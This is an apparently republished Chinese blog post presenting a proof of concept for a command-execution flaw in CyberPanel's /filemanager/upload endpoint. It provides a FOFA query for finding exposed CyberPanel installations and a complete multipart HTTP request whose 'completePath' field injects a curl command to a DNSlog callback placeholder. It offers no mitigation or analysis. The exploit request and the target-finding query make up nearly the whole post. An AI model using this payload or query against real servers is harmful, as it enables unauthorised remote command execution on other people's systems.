目录

CyberPanel开源Web控制面板 upload 命令执行漏洞复现及POC

FOFA

复制代码
app="CyberPanel"

POC

复制代码
POST /filemanager/upload HTTP/2
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Content-Type: multipart/form-data; boundary=----NewBoundary123456789
Content-Length: 338

------NewBoundary123456789
Content-Disposition: form-data; name="domainName"

<target>
------NewBoundary123456789
Content-Disposition: form-data; name="completePath"

curl http://DNSlog地址/
------NewBoundary123456789
Content-Disposition: form-data; name="file"; filename="poc.txt"

pwn
------NewBoundary123456789--

漏洞复现

本文是转载文章,点击查看原文
如有侵权,请联系 xyy@jishuzhan.net 删除
相关推荐
神经毒素5 小时前
WEB安全--内网渗透--LM&NTLM基础
安全·web安全
网络工程师_ling5 小时前
【内网安全】DHCP 饿死攻击和防护
网络安全
故事与他6456 小时前
迅饶科技X2Modbus网关-GetUser信息泄露漏洞
网络·科技·计算机网络·安全·web安全
写代码的小王吧7 小时前
【网络安全】 防火墙技术
java·python·安全·web安全·网络安全·docker
【云轩】8 小时前
《比特城的七重结界:从数据洪流到量子盾牌的终极守护》
网络·安全·web安全
浩浩测试一下12 小时前
内网渗透(杂项集合) --- 中的多协议与漏洞利用技术(杂项知识点 重点) 持续更新
安全·web安全·网络安全·系统安全·密码学·安全架构
iOS技术狂热者19 小时前
wireshak抓手机包 wifi手机抓包工具
websocket·网络协议·tcp/ip·http·网络安全·https·udp
christine-rr21 小时前
密码学基础——DES算法
安全·网络安全·密码学·密码
fanjinhong_852121 小时前
网络安全防御核心原则与实践指南
网络·安全·web安全